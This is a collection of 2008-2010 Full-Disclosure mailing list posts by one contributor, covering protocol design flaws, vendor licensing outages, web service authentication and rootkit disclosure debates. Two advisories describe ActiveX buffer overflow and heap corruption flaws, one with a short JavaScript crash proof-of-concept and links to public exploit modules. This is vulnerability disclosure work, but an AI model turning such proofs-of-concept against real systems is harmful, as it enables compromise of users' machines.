http://tagline.hushmail.com/fc/PnY6qxtz6M04r4PUxw0zUeIGPUNC89x4D6yvwbXxUKMzgFsomHdoM/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-28 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Dan has been an exception to just about every rule, including the
"you should take me seriously" rule. Not that this is a good thing,
the guy is brilliant...

On Wed, 26 Nov 2008 14:40:42 -0500 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On November 26, 2008 1:59:27 AM -0600 Elazar Broad
><[EMAIL PROTECTED]>
>wrote:
>
>>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Um, NTLM isn't the only 20 or so year old protocol to take the
>rap
>> recently, I can think of a low numbered rfc, lets say 1034 and
>> 1035. Hindsight is 20/20, and 20 years ago, who would have
>thought
>> that a 16 bit number was way too small for DNS transaction id,
>the
>> same "who would have though" goes for NTLM and the rest. Lets
>face
>> it, protocol design bugs suck, and to completely replace a
>widely
>> used protocol ranks pretty high in the PiTA hall of fame...
>>
>
>In that particular case Dan Bernstein not only *did* think about
>it but
>actually did something about it.  It's just that no one else was
>listening.
>
>Paul Schmehl, If it isn't already
>obvious, my opinions are my own
>and not those of my employer.
>**
>WARNING: Check the headers before replying
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkwQUkACgkQi04xwClgpZiDIQP9FlPRrcxmuee/EiJFAAYZrAeTKvqj
Lze+xlyTfWickh0JaczRYfNnho5MWAiie+jF5QjcXPJTch64hWvxm8PzjRbIqcnGGbMa
dtvUk7PF7hELryWHy8CRu/WGHq5ejD3CFegdnX9HpbKD8zBXmuJdtNpSc0wwGvGcxe9z
XBCqXx4=
=w/u9
-END PGP SIGNATURE-

--
Click here to choose from a huge selection of the billiard accessories you need.
http://tagline.hushmail.com/fc/PnY6qxubm7YZMMzPW1eIA3ZOBhrMWDmFw8sLmh0HJftgy2H1YOYys/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Sonicwall license servers down .. all customers affected

2008-12-02 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I stopped using SonicWall when I learned I had to purchase a whole
new device for a customer that just wanted to add a few more
machines to their network, instead of bumping the license like most
"normal" vendors.

On Tue, 02 Dec 2008 14:14:43 -0500 IT Security
<[EMAIL PROTECTED]> wrote:
>Sonicwall (makers of various security products) has had their
>license
>manager (server) go haywire overnight and it's "reset" (meaning
>invalidated)
>the licenses on all of their email security products. This means
>customers
>can't login to their own systems (a good case against draconian
>DRM like
>this). Calls to support have gone straight to voicemail all
>morning, and no
>ETA for resolution yet exists.
>
>This is affecting **all** of their customers, as far as I can tell
>(and
>based on what I'm told by their general support ticket-taker).
>
>Their forum (probably requires registration) is full of complaints
>about it.
>Screenshots of it and other problem areas are available on request
>.. but I
>don't want to email them to this entire list).
>
>The first alert was these warnings :
>
>
>~~ SonicWALL Email Security Alert (6.2.2.1071) ~~
>
>
>[Summary: Your Email Security licenses have been reset.]
>
>Details:
>Host Name: **ourmailhost**
>Description: The Email Security licenses have been reset at
>12/02/2008 04:18 EST. The email filtering will not be
>working.
>
>TimeStamp:
>LocalTime: Tue Dec 2 04:18:49 2008
>GMT: Tue Dec 2 09:18:49 2008
>
>Additional Information:
>Recommended Action: Please contact SonicWall Technical
>Support.
>
>A response from their technical support on the issue went like
>this :
>
>"The issue is on our backend server who stores the registrations,
>some ES
>appliances got licences resetted. The exact cause is still being
>analized
>with high priority. In those cases entering the mysonicwall
>credentials or
>uploading file solve the issue. Kind Regards Ivan"
>
>And as of now, their license server is **still** off-line :
>
>$ telnet licensemanager.sonicwall.com 443
>Trying 204.212.170.143...
>telnet: Unable to connect to remote host: Connection refused
>
>DRM schemes like this only cause problems for the LEGITIMATE
>customers .
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkk1jiwACgkQi04xwClgpZidpwP9EGnoiLpcTxqCI8uZn6IPZ5xNfSXs
mFJBuV7+4DimJdh1Wr6XdevITM3XTvb56SqoLuKYXJTatlt5pExV16PqpCbNFTIGJl/x
TjqFF2//M1GE0+02mfSpVFBTXAsji6chEWSM7KSk+4h/BGIpppc1bLC45JEscgrEWp4N
OBvxfp8=
=zRVw
-END PGP SIGNATURE-

--
Paying too much for your business phone system?  Click here to compare systems 
from top companies.
 
http://tagline.hushmail.com/fc/PnY6qxu9tWrxyM1PdHDmXgMv34TDO7Gvn9NbAdfSuL24iBSp0vlKw/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Project Chroma: A color code for the state ofcyber security

2008-12-02 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad <[EMAIL PROTECTED]>
wrote:
>Mike C wrote:
>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad <[EMAIL PROTECTED]>
>wrote:
>>
>>> and how does making a color based on these inputs protect
>people?
>>>
>>>
>>
>> Once all desktops have an icon or widget (say at the right hand
>> corner) with the color, and this is consistently seen
>everywhere, the
>> users will start associating with their online security. they
>will be
>> reminded that they have to be careful with the data they share.
>>
>> This, if implemented correctly will be a boon to security
>industry,
>> where the weakest kinks currently are 'n00b'  users.
>>
>>
>you are joking right?
>
>So some widget is going to stop the next SMB remote or IE client
>side
>and protect the 'n00b' users? Please explain how this works. Also
>please
>explain how "they will be reminded that they have to be careful
>with the
>data they share. " has anything to do with protecting a users
>machine
>from being compromised.

Thats the whole point. There is a fine line between using visual
alerts to put people(Joe six pack) into a state of "awareness"(more
like mild hysteria) of a threat versus knowing how to protect
oneself against that threat and using that awareness indicator as
the kick in the ass to get moving and shore up the defenses(hell,
how many security folk do this too, then again, every time
something goes bump we see red). Visual alerts are great at
persuasion tools, especially when the goal is to get Joe to buy
your latest all-in-one-will-make-your-coffee-and-buy-you-beer
AV/Malware/Spyware/Foo(whats this doing here?)/evil monkey in the
closet package. So of course, Joe will never learn how to properly
defend his computer/data, and the "industry" will prosper.

Now, thanks to our good friends over at the DHS, the color system
has turned into a complete and utter joke(for the most part), so my
friend, you see, this a complete exercise in futility(besides the
fact that every friggin AV/IDS/Security/SIM company out there has
red, yellow and green as their corporate "flag", if you are just
joining the party, then you can completely ignore this)

If you really want to change state of security for the n00bs,
spread the knowledge, not the colors.

My .02...

elazar

-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkk1jJIACgkQi04xwClgpZgUfgP/V8LI3a3rHs7C4q2ysvKV4NbQ4cPU
nWV6y48oJ4FESHpt+TZnOjgG1hk/co/ANgejLnYAwwJQDL/rxjvfi9NY/GPK1iNeTiXm
GUWrfrAhllrd2mov4lMXf5RVGq7Qrrk1ZXvEOmhZrDMd8dCQme0ORK+3CUB3S9PUGpfH
22I5eKQ=
=OTUm
-END PGP SIGNATURE-

--
Become a Graphic Designer and earn up to $150/ hour. Click here.
http://tagline.hushmail.com/fc/PnY6qxunKhhCjqRvNj8oq36yZn7HJGDPFWA7dYMteZ51ZzHPUHKiM/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Unless you wrap your service methods with some form of an
authentication, your webservice's are just as public as any other
"world" accessible part of your site. Are the pages calling these
services behind any sort of authentication?

On Thu, 06 May 2010 01:44:07 -0400 Ed Carp  wrote:
>We've got a lot of JQuery code that calls back-end web services,
>and
>we're worried about exposing the web services to the outside world
>-
>anyone can "view source" and see exactly how we're calling our web
>services.
>
>Are there any suggestions or guidelines regarding protecting one's
>source from such disclosure?  Thanks in advance!
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkvi93MACgkQi04xwClgpZjfcgP/d0S5hyRlsAypsOue6A6HVLMpvTXT
S3LyNJGpmoMcKAVRldWuIz5kP3dQ3BIHJEEdC1qKLwtSOEgAlxM/1XkMR7zhi4qJUzp0
a2LisyC8k2xgWIYSfmiqG//tDWzME4EeYHZiGo0iK0fDPLLSwnad9+aeEdRdNI2vmfIc
N6eQJeo=
=4zuK
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

If his users are authenticated via say regular form login, he can
pass some sort of hash which identifies the user and session to the
service, with the authentication wrapper being server side, which
begs the question, do you trust your users...

How would such a firewall work/help anyway? It still has to make
some sort of authorization decision, and if the services in
question are not called by pages that are login protected, your
back to square one. How do you pass some sort of 'I know this is
the page calling me and not the attacker' without the client seeing
that too?

elazar

On Thu, 06 May 2010 13:46:08 -0400 T Biehn  wrote:
>A proxy or 'web-service firewall' prior to the 'protected' web
>service is
>the correct answer.
>
>Obfuscating the client code be it JavaScript, Interpreted (Java,
>CLR, etc)
>or Native ignores the notion that the client controls hardware,
>OS, the
>executing process and the network.
>
>Signals can be intercepted at any layer.
>
>Any other assertion is ridiculous and a waste of time and effort.
>
>-Travis
>
>On Thu, May 6, 2010 at 1:08 PM, Elazar Broad 
>wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Unless you wrap your service methods with some form of an
>> authentication, your webservice's are just as public as any
>other
>> "world" accessible part of your site. Are the pages calling
>these
>> services behind any sort of authentication?
>>
>> On Thu, 06 May 2010 01:44:07 -0400 Ed Carp 
>wrote:
>> >We've got a lot of JQuery code that calls back-end web
>services,
>> >and
>> >we're worried about exposing the web services to the outside
>world
>> >-
>> >anyone can "view source" and see exactly how we're calling our
>web
>> >services.
>> >
>> >Are there any suggestions or guidelines regarding protecting
>one's
>> >source from such disclosure?  Thanks in advance!
>> >
>> >___
>> >Full-Disclosure - We believe in it.
>> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >Hosted and sponsored by Secunia - http://secunia.com/
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>>
>wpwEAQECAAYFAkvi93MACgkQi04xwClgpZjfcgP/d0S5hyRlsAypsOue6A6HVLMpvTX
>T
>>
>S3LyNJGpmoMcKAVRldWuIz5kP3dQ3BIHJEEdC1qKLwtSOEgAlxM/1XkMR7zhi4qJUzp
>0
>>
>a2LisyC8k2xgWIYSfmiqG//tDWzME4EeYHZiGo0iK0fDPLLSwnad9+aeEdRdNI2vmfI
>c
>> N6eQJeo=
>> =4zuK
>> -END PGP SIGNATURE-
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>--
>FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerpr
>int=on
>http://pastebin.com/f6fd606da
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkvjA5AACgkQi04xwClgpZhv5QP9HcdmzyQZwYcvEtMbAWWBytvRpw6d
mKENP9+wWTQphXcWoaQaf1cbKwnISfCkbzSvF1pKV61QyDLDlxocYQ5sNvAjthW2yHkS
N8Kq7Bod0jpfl1CZcZy3RCs3Fju+DQPBvhCJ56wGAwhzBtPvHerSGXFx3dVPYIxV9Cfb
Qu/5NV8=
=Ixct
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] round and round they go

2008-02-21 Thread Elazar Broad

http://blog.wired.com/27bstroke6/2008/02/researchers-dis.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Move Networks Quantum Streaming Player UploadLogs() Buffer Overflow

2008-02-25 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Move Networks
http://www.movenetworks.com/

What:
Move Networks is a streaming media provider who's clients include
Fox, ABC, ESPN etc. They employ an ActiveX control to display
content in the clients browser.

How:
qsp2ie07074039.dll version 7.7.4.39(digitally signed Tuesday,
September 18, 2007 7:10:35PM)
{E473A65C-8087-49A3-AFFD-C5BC4A10669B}

The url parameter of the UploadLogs() method is vulnerable to a
buffer overflow.

Workaround:
Set the killbit for this control, see
http://support.microsoft.com/kb/240797

Fix:
No official fix known

Exploit:
Will be posted on milw0rm.com

Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkfDo+EACgkQi04xwClgpZiSQwP+OVVbAEDFc728APhQBQgcgeOXP/6K
WcLjPLdz2lXRO3P15Umrqgr6tChJ0HbsW40U67+zyw0VG0k87IL6ZOyqjRtNPWwb4j7W
3EjC04vI9pxQBtjoG9ZR80PX6ociLCq7ApS1uOsSDy61N/092E4mIKbCwD6coTuUzP5U
Q56IVKo=
=v29c
-END PGP SIGNATURE-

--
Click to shop and save on brand name copiers today.
http://tagline.hushmail.com/fc/Ioyw6h4efL3TOAtEgKVyrVjF0g3IeZGowAyIsMPtoIkky6N3oFUUnm/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption

2008-03-09 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Real Networks
http://www.real.com

What:
Real Networks Real Player is a popular media player.

How:
Real Player utilizes an ActiveX control to play content within the
users browser.

rmoc3260.dll version 6.0.10.45
{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}

It is possible to modify heap blocks after they are freed and
overwrite certain registers, possibly allowing code execution. Like
so:

- 
var buf = '';
while (buf.length < 1005) buf = buf + 'A';

m = obj.Console;
obj.Console = buf;
obj.Console = m

//repeat
m = obj.Console;
obj.Console = buf;
obj.Console = m --> Should crash here
- -

Workaround:
Set the killbit for this control. See
http://support.microsoft.com/kb/240797

Fix:
No official fix known

Exploit:
Working on it

Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkfUzEEACgkQi04xwClgpZhsDQP+OPMkrAZcp/kR1MCleBervmVYPRc1
2cMRLBbhFcUC7Uc/ajXmKe6naZEr1RqKzHBrugWZeANkP5gdk/Kd/fOXacCZcVApXSJj
OcopiKRr7tnTi13Rt4XW4oBRjpiWHyHxFZA06Jzc2JJHeF7sTrew+s43PTU1eaj9/w4o
Nf0Ydt8=
=IpTC
-END PGP SIGNATURE-

--
Energy Saving Heating and Cooling Systems. Click for free information.
http://tagline.hushmail.com/fc/Ioyw6h4dbo0qfLJjDSbocxFRYwpBkZwjS6vzQEbs8WmdoAPvpevJZe/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game

2008-04-01 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Let the foolz begin :) Happy April 1st!

On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION
<[EMAIL PROTECTED]> wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES
>   AND A CLOSED SOURCE LICENSE AGREEMENT.
>
>After over a year and a half in stealth-mode, Metasploit
>Corporation has announced
>the 4.0 release of their flag-ship product, The Metasploit
>Framework.  The new
>release comes jam-packed with exciting features that are sure to
>please even
>the German legal system.  The following brief list includes some
>of the more
>fantastic changes.
>
>PWNCRAFT!
>
>Tired of fighting the good fight with the tried and true user
>interfaces you've
>come to expect from exploitation frameworks?  Seeing a command
>shell for the
>5000th time got you down?  Well, you're in luck.  Metasploit has
>decided to
>return to its rootz in '08 and focus on the exploitation-as-a-game
>model.
>PwnCraft brings the worlds of ownage and pwnage together for the
>first time in
>a revolutionary Real Time Strategy (RTS) world.  Don't be fooled
>by the
>game-like interface, though!  The actions you take in PwnCraft
>have a real
>effect on the world around you!  Here's just a taste of some of
>the absolutely
>insane features you can look forward to:
>
>  - Glide through enemy networks with a squadron of elegant winged
>pwnies
>  - Launch devastating attacks against enemy ports in an all-out
>IPS-evading
>TCP/IP assault
>  - Use the fuzzy Burrowing Badger unit to discover 0day flaws in
>enemy
>defenses
>  - Conqueer cities and installing agents who can sabotage and
>smuggle other
>units to new Vistas
>  - An entirely in-game interface to the vulnerability sharing
>market to
>improve your arsenal on the fly!
>  - AND MORE!
>
>Beta testing of PwnCraft is currently underway and we are hoping
>to begin
>releasing it in stores at a retail price of $49.99 in Q3 2009.
>More details
>about the game can be found on the Metasploit website:
>
>http://metasploit.com/
>
>
>CLOSED SOURCE LICENSE
>
>After years of struggling to define Metasploit's licensing
>position a final
>decision has been made to "screw it" and move the framework to a
>closed source
>license agreement.  The decision was made to sell out for a number
>of reasons,
>not the least of which has to do with the benjamins.  Metasploit
>2.x and 3.x
>will no longer be available for public download.
>
>SPLOIT AT ME
>
>Get the latest exploits from Metasploit's patent-pending Sploit At
>Me service
>that delivers exploits on demand.  You can rest assured that
>Metasploit's
>Sploit At Me service will attempt to compromise machines of your
>choosing with
>*99% reliability.
>
>About Metasploit Corporation
>
>Metasploit Corporation is an industry leader with thousands of non-
>paying
>customers world-wide.  Metasploit delivers high-quality, top-
>notch,
>success-driven exploits to the security world as one-stop-shop
>exploitation
>framework.
>
>
>  * The other 1% of the time, your own machine will be
>compromised.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkfyRp8ACgkQi04xwClgpZgvQwP+P5O3dPIIu3t/aOJo8ufryik2p4BS
J1xM7129LTFPfwNgx2lnBEAbLvLSAUMcgRaHBD0HJ+u6r/mxLJd7S0XFYRDjFGJ6PTYE
i7/HRYmIQAXY1ENCyBHPvADGs7Ivj4x4sfcGN7OoeOcDyufqm0DC6LMkatQUxKu+lLoF
7yhhn9U=
=j0A2
-END PGP SIGNATURE-

--
Click here for free info on Graduate Degrees.
http://tagline.hushmail.com/fc/Ioyw6h4eSposADR0PtOIVVC5EPU4F30Wlhs3UJjIvS4qQsdD3pzBWo/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption

2008-04-01 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Now that this is patched...

http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/
browser/realplayer_console.rb

Elazar


On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Real Networks
>http://www.real.com
>
>What:
>Real Networks Real Player is a popular media player.
>
>How:
>Real Player utilizes an ActiveX control to play content within the
>users browser.
>
>rmoc3260.dll version 6.0.10.45
>{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
>{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}
>
>It is possible to modify heap blocks after they are freed and
>overwrite certain registers, possibly allowing code execution.
>Like
>so:
>
>
>var buf = '';
>while (buf.length < 1005) buf = buf + 'A';
>
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m
>
>//repeat
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m --> Should crash here
>-
>
>Workaround:
>Set the killbit for this control. See
>http://support.microsoft.com/kb/240797
>
>Fix:
>No official fix known
>
>Exploit:
>Working on it
>
>Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkfyWNoACgkQi04xwClgpZgyVgP+N7kKGC7cD/1qnnauXIi30j+fmEbK
sIe+tOWjTSUKcoTZsoFLiQYd3tKu/t+mauZSi1msUaPgjHu1Or/laRU3Wgw008lnLAmC
lT4O/tjlZP6luuzxCHyDrY6p5ze4sb4uDukKnGVHqpNMDoK/s0TFD/fZiaBdc7ZFvL9o
4Y6w7ZY=
=IpM9
-END PGP SIGNATURE-

--
Click here for free info on Graduate Degrees.
http://tagline.hushmail.com/fc/Ioyw6h4eSposuNJokZ1ABDCgGd9ckObZCsDzUVQlPhlov4Mrkal8uM/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [NANOG] IOS rootkits

2008-05-18 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Keep in mind that rootkit functionality itself isn't all bad, take
anti-virus software for example. Its like a shark trawling the
bottom of the sea floor, looking up at its next meal on high; how
deeply can you hook the OS core...

Elazar

On Sun, 18 May 2008 14:45:48 -0400 Kurt Dillard
<[EMAIL PROTECTED]> wrote:
>Apparently Gadi  doesn't understand either.  Rootkits don't need
>to exploit
>vulnerabilities in an OS, they leverage the design of the OS or
>the
>underlying hardware platform. You don't 'patch' the design of
>something. You
>want to stop rootkits in IOS? Don't allow it to run arbitrary
>code, run the
>OS in firmware rather than from writable storage. Go study up on
>rootkits
>for a few weeks before you complain about someone demonstrating
>one. Unlike
>you guys I happen to know what I am talking about as I've been
>studying
>malware including rootkits for over 10 years. By studying I mean
>taking them
>apart, figuring out how they work, and finding tools to deal with
>them; not
>reading some half-assed article on CNET or Ziff-Davis full of
>technical
>errors.
>
>Over the past few years Cisco, Apple, and Oracle have behaved an
>awful lot
>like Microsoft did 10 years ago, trying to pretend that their
>platforms are
>immune to malware and refusing to approach vulnerabilities head-on
>with an
>attitude of rational pragmatism. Dave Litchfield and his team have
>dragged
>Oracle kicking and screaming to the world of reality, the same has
>yet to
>happen with the other two firms.
>
>-Original Message-
>From: [EMAIL PROTECTED]
>[mailto:[EMAIL PROTECTED] On Behalf Of
>n3td3v
>Sent: Sunday, May 18, 2008 12:50 PM
>To: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] [NANOG] IOS rootkits
>
>On Sun, May 18, 2008 at 4:37 PM, Kurt Dillard
><[EMAIL PROTECTED]> wrote:
>> NETDOVE,
>> Obviously you have no idea how a rootkit works much less how to
>defend
>> against them, your rants make no sense.
>>
>> Kurt
>
>Dude,
>
>Gadi Evron is punching into this guy as well, check this out:
>
>-- Forwarded message --
>From: Gadi Evron <[EMAIL PROTECTED]>
>Date: Sun, May 18, 2008 at 3:48 PM
>Subject: Re: [NANOG] IOS rootkits
>To: Dragos Ruiu <[EMAIL PROTECTED]>
>Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
>[EMAIL PROTECTED]
>
>
>On Sun, 18 May 2008, Dragos Ruiu wrote:
>>
>> On 17-May-08, at 3:12 AM, Suresh Ramasubramanian wrote:
>>
>>> On Sat, May 17, 2008 at 12:47 PM, Matthew Moyle-Croft
>>> <[EMAIL PROTECTED]> wrote:
 If the way of running this isn't out in the wild and it's
>actually
 dangerous then a pox on anyone who releases it, especially to
>gain
 publicity at the expensive of network operators sleep and well
>being.
 May you never find a reliable route ever again.
>>>
>>> This needs fixing. It doesnt need publicity at security
>conferences
>>> till after cisco gets presented this stuff first and asked to
>release
>>> an emergency patch.
>>
>> Bullshit.
>>
>> There is nothing to patch.
>>
>> It needs to be presented at conferences, exactly because people
>will
>> play ostrich and stick their heads in the sand and pretend it
>can't
>> happen to them, and do nothing about it until someone shows
>them, "yes
>> it can happen" and here is how
>>
>> Which is exactly why we've accepted this talk. We've all known
>this is
>> a possibility for years, but I haven't seen significant motion
>forward
>> on this until we announced this talk. So in a fashion, this has
>> already helped make people more realistic about their
>infrastructure
>> devices. And the discussions, and idea interchange that will
>happen
>> between the smart folks at the conference will undoubtedly usher
>forth
>> other related issues and creative solutions.  Problems don't get
>fixed
>> until you talk about them.
>
>Dragus, while I hold full disclosure very close and it is dear to
>my
>heart, I admit the fact that it can be harmful. Let me link that
>to
>network operations.
>
>People forget history. A few years back I had a chat with Aleph1
>on the
>first days of bugtraq. He reminded me how things are not always
>black and
>white.
>
>Full disclosure, while preferable in my ideology, is not the best
>solution
>for all. One of the reasons bugtraq was created is because vendors
>did not
>care about security, not to mention have a capability to handle
>security
>issues, or avoid them to begin with.
>
>Full disclosure made a lot of progress for us, and while still a
>useful
>tool, with some vendors it has become far more useful to report to
>them
>and let them provide with a solution first.
>
>In the case of routers which are used for infrastructure as well
>as
>critical infrastructure, it is my strong belief that full
>disclosure is,
>at least at face value, a bad idea.
>
>I'd like to think Cisco, which has shown capability in the past,
>is as
>responsible as it should be on these issues. Experience tells me
>they have
>a ways to go yet ev

Re: [Full-disclosure] Geeks

2008-05-19 Thread Elazar Broad

Yea, and there are plenty that can't even set up their own home 
network...

On Mon, 19 May 2008 15:34:41 -0400 Soldi <[EMAIL PROTECTED]> 
wrote:
>> CISSP's cant hack
>
>Huh?
>
>There are plenty of CISSPs you wouldn't want on your bad side. 
>They just decided to grow up and  make a legitimate living. It 
>simply creates a 'standard' by which companies can use to gauge a 
>person's understanding is at a base level.
>
>They also learned how to use spell check and form a proper 
>sentence that one does not have to read three times to understand.
>
>
>
>- Original Message 
>From: wilder_jeff Wilder <[EMAIL PROTECTED]>
>To: Morning Wood <[EMAIL PROTECTED]>; n3td3v 
><[EMAIL PROTECTED]>; full-disclosure@lists.grok.org.uk
>Sent: Monday, May 19, 2008 8:58:26 AM
>Subject: Re: [Full-disclosure] Geeks
>
> The CISSP is a management certification... not a techie cert... I 
>dont need to hack to keep one out..
> 
>
>
>-Jeff
>
>
>
>-BEGIN GEEK CODE BLOCK-
>Version: 3.1
>GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M--
>V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++
>G e* h--- r- y+++*
>--END GEEK CODE BLOCK--
>
>> From: [EMAIL PROTECTED]
>> To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
>> Date: Thu, 15 May 2008 09:11:37 -0700
>> Subject: Re: [Full-disclosure] Geeks
>> 
>> >> Anybody who thinks a CISSP is a "license to hack" is 
>dreadfully ignorant
>> >> of what little overlap there is between hacking skills and 
>the material
>> >> covered in the CISSP.
>> 
>> CISSP's cant hack
>> 
>> 
>> 
>> Donnie Werner ( not a ) CISSP
>> http://exploitlabs.com
>> 
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/

--
Click here to save cash and find low rates on auto loans.
http://tagline.hushmail.com/fc/Ioyw6h4ejOhhgcIwxCBzYkN9p56huQ4r23NLm1aB6QxHPqm89svvnC/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Need some help with management

2008-05-23 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Its not even funny how often this happens. I have a friend who does
some consulting work for small businesses, and the amount of times
that he has come across medical practices that run their billing
and record keeping software on the same "fully-loaded" XP box that
their receptionist(s) use to download random crap...

E

On Fri, 23 May 2008 11:24:29 -0400 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On Thursday, May 22, 2008 20:45:06 -0700 coderman
><[EMAIL PROTECTED]> wrote:
>
>> On Thu, May 22, 2008 at 9:51 AM, Daniel Sichel
><[EMAIL PROTECTED]>
>> wrote:
>>> My management here wants to put a server on our LAN, not
>administered by us
>>> ...
>>
>> all of the responses to this are retarded.
>>
>> tell him to setup a server.  dare him. double dog dare!
>>
>> when it pings, load it full of goatse.cx and tubgurl and
>lemonparty.
>>
>> ask, "do you want to run AND SECURE your own server?"
>>
>> case closed.
>>
>
>You clearly don't work anywhere near an enterprise.  If you did,
